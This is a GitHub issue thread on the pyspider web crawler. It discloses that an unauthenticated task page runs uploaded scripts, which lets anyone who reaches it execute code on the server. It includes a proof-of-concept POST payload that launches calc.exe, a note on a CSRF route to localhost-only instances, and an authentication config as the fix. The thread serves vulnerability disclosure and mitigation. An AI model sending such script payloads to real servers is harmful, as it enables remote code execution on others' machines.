binux / pyspider

A Powerful Spider(Web Crawler) System in Python.
http://docs.pyspider.org/
Apache License 2.0

Script content needs security check which could cause RCE #964

Open lvf233 opened 3 years ago

lvf233 commented 3 years ago

🐛 Bug Report

Script content needs security check which could cause RCE

To Reproduce

  1. start up a pyspider-server.
  2. access the task webpage.
  3. upload a task with malicious script.
  4. bingo!

Expected behavior

The server will execute whatever code you set (it ran calc.exe, which I set to prove this vuln).

Test script or set of commands reproducing this issue

Post this task as follows to the server.

data = {
'webdav_mode': 'false',
'script':  '''from pyspider.libs.base_handler import *
import socket
import os
import sys
import time
import subprocess

def test():
    try:
        p=subprocess.call(["calc.exe",])
    except:
        pass
####  
class Handler(BaseHandler):
    def on_start(self):
        test()
''',
'task':'''{
  "process": {
    "callback": "on_start"
  },
  "project": "pyspider_test",
  "taskid": "data:,on_start",
  "url": "data:,on_start"
}
'''
}

Environment

pyspider v0.3.10 system ubuntu 18.04 & windows 10 version1909

binux commented 3 years ago

Yes, running scripts is fundamental to this project. There's a warning in the readme that you can set up auth for the task page.

lvf233 commented 3 years ago

> Yes, running scripts is fundamental to this project. There's a warning in the readme that you can set up auth for the task page.

Yeah, most people still start pyspider with the default configuration; could the modification of this default setting be forced? Meanwhile, we also designed such a scenario, which works even when only localhost is allowed to access, while JavaScript is supported (using other components for rendering). We use the CSRF method to make requests to the local pyspider to achieve the same effect.
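For operators reading this thread, the mitigation binux points to (and the one the CSRF scenario above shows is needed even for a localhost-only deployment) is to turn on webui authentication. The following config.json is an added example, not a file from the pyspider project or from this issue; the key names follow the documented config.json layout and the webui command's `--need-auth`, `--username`, `--password` and `--host` options, and the values are placeholders to replace. Pass it with `pyspider -c config.json` so the task/debug page is no longer reachable without credentials.

```json
{
  "webui": {
    "host": "127.0.0.1",
    "port": 5000,
    "need-auth": true,
    "username": "replace-with-admin-name",
    "password": "replace-with-long-random-secret"
  }
}
```

Binding to 127.0.0.1 limits who can reach the UI directly, but as the comment above notes a browser on the same host can still be driven to post to it, so `need-auth` is the setting that actually closes the unauthenticated script-upload path.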